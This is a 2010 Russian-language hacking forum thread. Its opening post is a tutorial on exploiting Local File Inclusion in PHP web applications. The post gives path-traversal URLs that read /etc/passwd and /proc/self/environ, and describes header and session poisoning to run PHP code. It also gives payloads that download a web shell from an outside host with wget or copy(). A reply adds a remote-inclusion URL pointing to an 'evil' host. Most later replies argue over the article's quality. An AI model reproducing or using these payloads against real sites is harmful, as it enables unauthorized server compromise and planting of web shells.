Авторские статьи Что такое LFI и с чем его едят.

Discussion in 'Статьи' started by <Cyber-punk>, 25 Sep 2010.

  1. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Что такое LFI и с чем его едят.


    LFI
    Иначе говоря, Local File Include.


    Внимание! Информация предоставленна, исключительно с целью ознакомления. Автор не несёт ответственность за ваши действия.

    Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере.

    В общем, грубо говоря, мы можем осуществить чтение php-кода (и не только) из файла при наличии LFI.

    Мне, да и другим, чаще всего встречается в различных менеджерах файлов.

    Специально, под такой случай нашёл наглядный пример:

    [​IMG]


    http://server/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

    Как через эту уязвимость залить шеллл?


    Обращаемся к одному из лог-файлов:

    У меня это proc/self/environ будет. Обращаемся к лог-файлу - http://server/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00

    и видим следующее:

    [​IMG]


    Особенно уделяем внимание данным которые мы передаём, т. е. USER_AGENT (логируется), ACCEPT_ENCODING(не логируется), etc.

    Добавим в эти данные код:

    [​IMG]

    В ответ видим такой ответ:

    [​IMG]

    Чтож, всё лучше чем мы думаем — исполняется пхп код!

    Заливаем наш шелл на народ, чтобы получилась строка — http://site.narod.ru/shell.php
    Теперь у нас есть два варианта заливки шелла, исполняем этот пхп код <?php copy (http://site.narod.ru/shell.php''), 'temp.php') ?> или этот <?php system('wget http://site.narod.ru/shell.php'); ?>

    Далее ждём пока страница загрузится, и переходим по адресу http://server/shell.php и наслаждаемся шеллом!

    Так же можно попробывать выполнить php код прямо в адрессной строке, но это только при большой везучести.


    http://server/index.php?dir=data:,<?php system('wget http://site.narod.ru/shell.php'); ?>


    Это при*

    PHP Version => 5.2.0
    allow_url_include = On


    Так, едем дальше.

    Часто возникают вопросы, а как залить шелл в виде картинки. Вот ответ:

    Находишь форум, или другой источник откуда можно загрузить файл изображения. Если анализатор хреновый - он пропустит твою картинку с php кодом внутри, затем можешь исполнить код:

    http://server/script.php?file=../../../shell.jpg%00


    Так, вроде бы с картинками разобрались.

    Так же уязвимость может быть в сессии.

    Например:

    Заходим на уязвимый сайт, пару раз обновляем и смотрим cookies:
    [​IMG]


    Копируем данные из Content, и делаем такую ядовитую строку, вместе с линуксовой коммандой uname -a:

    [​IMG]

    Showtime! Команда выполнилась, а это значит — ещё один путь для загрузки шелла!

    Послесловие.
    По сути эта статья - сборник информации по LFI-injection. Это конечно-же не вся информация о LFI-injection но всё-же надеюсь часть информации,
    изложенной здесь, поможет системным администраторам и разработчикам принять меры по защите от таких
    уязвимостей.



    (с)<cyber-punk>
     
    _________________________
    #1 <Cyber-punk>, 25 Sep 2010
    Last edited: 27 Sep 2010
    8 people like this.
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Удалите кто-нибудь этот бред...
     
    #2 mailbrush, 25 Sep 2010
    Last edited: 25 Sep 2010
    2 people like this.
  3. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    У меня лишь одно слово - Здорово!!11
    Лучшей статьи, где бы так охуенно раскрывалась суть вопроса, я еще не встречал. Автор, срочно в РОА, ну просто срочно!
     
  4. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Спасибо! Много узнал!
     
  5. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Мягко говоря, статья не о чем.
     
    2 people like this.
  6. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    0_o мегасупер статья, нет не в РОА там ему делать нечего лучше сразу в МОА ...
    P.S /me в шоке =\
     
    _________________________
  7. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    го в LОА :)
     
    1 person likes this.
  8. TheLuckyOne

    TheLuckyOne New Member

    Joined:
    9 Sep 2010
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Уржался с комментов)))

    Статью в корзину, новой инфы ни копейки
     
  9. Sajeys

    Sajeys Banned

    Joined:
    24 Aug 2010
    Messages:
    206
    Likes Received:
    35
    Reputations:
    5
  10. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Вобщем я понимаю немного ироничное отношение некоторых наших юзеров с репутацией, одного я понять не могу- откуда ирония в словах у людей из раздела мировых новостей, либо с раздела- купи-продай.... Вот он эффект толпы- на лицо...
     
    1 person likes this.
  11. Sajeys

    Sajeys Banned

    Joined:
    24 Aug 2010
    Messages:
    206
    Likes Received:
    35
    Reputations:
    5
    Если стоит цифра 4, то это значит, что я не соображаю в этом абсолютно ничего?
     
    #11 Sajeys, 25 Sep 2010
    Last edited: 25 Sep 2010
  12. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Согласен полностью :D поэтому и залез в темы созданные Вами :D ну и сообщения заодно просмотрел :) Надеюсь это показатель? Или что для Вас является показателем?

    Скажем так- если циферки в расчет не брать посмотри все сообщения например от Redwood и сравни :) когда говорил про репутацию- имел именно ввиду такое :) а не циферки
     
    #12 Kusto, 25 Sep 2010
    Last edited: 25 Sep 2010
    1 person likes this.
  13. Sajeys

    Sajeys Banned

    Joined:
    24 Aug 2010
    Messages:
    206
    Likes Received:
    35
    Reputations:
    5

    То есть если я знаю о чем-то, то я должен в каждом сообщении упоминать об этом?
     
  14. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    :) Ну а что тут еще скажешь, достаточно много времени не заходил на форум, после известного инцидента и смены цвета. Как зашел, сразу увидел много лиц в группах(теперь уже опустевших), и многие из "лиц" меня мягко говоря удивили :)
    Ну а уж валовые статьи, которые поперли потом, вызывают у меня просто восторг))) А еще больший восторг, вызывают люди их написавшие, которые несколько месяцев назад сидели в Вопросы по уязв., и задавали вопросы, описаные множество раз в статьях от мемберов. А теперь вот они же пишут свои статьи)
    Ех, мне бы минусомет ^_^
     
    #14 m0Hze, 25 Sep 2010
    Last edited: 25 Sep 2010
  15. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Мохзе- я думаю что на форуме найдется мало людей которые бы относились к тебе без уважения (это не ирония), никто не оспаривает твоих знаний, и еслиб не инциндент, как ты выразился, твой ник быстро бы менял окраску, но здесь дело в том что например ТС изложил материал так как его понимает сам, на сегодняшний момент, я бы считал статью удавшейся еслиб пошли коменты, где неправ ТС, либо дополнения по теме, а здесь получается что мы даем по рукам творчеству :D , х.з. мне это показалось не правильным :) отсюда и мои каменты :) , всетаки лучше чем вон в соседней теме люди с утра уже яндекс хекают :D ещеб чуть чуть и им бы это удалось :D :D
     
    2 people like this.
  16. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Вы все оффтоперы и перебанить Вас всех надо. :D :D :D
     
  17. Vitya_ak

    Vitya_ak Member

    Joined:
    30 Aug 2010
    Messages:
    11
    Likes Received:
    11
    Reputations:
    0
    Статья шик, я люблю паблики)))))
     
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вообще-то грубо говоря, LFI представляет из себя подключение любого файла на сервере к вызываемому файлу. Что делит LFI на две ветки, либо выполнение содержимого подключаемого файла, либо чтение содержимого подключаемого файла.

    И вообще в статье нет упоминания про ограничения, про возможности и про сложности при работе с LFI.

    А вот это вот:
    уже выходит за рамки LFI так как при allow_url_include = On можно спокойно подключить свой файл из внешнего сервера: vuln.php?targe=http://evil/shell.php?

    На мой взгляд тут: http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
    всё что нужно знать, есть.
     
    _________________________
    #18 Expl0ited, 26 Sep 2010
    Last edited: 26 Sep 2010
    1 person likes this.
  19. TheLuckyOne

    TheLuckyOne New Member

    Joined:
    9 Sep 2010
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    2Kusto

    Но ведь факт, ничего нового не открыл. Оформление на момент прочтения мной было ужасным. Информативность тоже можно выделить в отдельную категорию. Комментарии с мнениями ~"вот блин толпа" тоже комментарии толпы, которая в свою очередь мнит себя выше.

    Пардон за оффтоп.
     
  20. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Протев!
    Статья понравилась! Молодец ТС!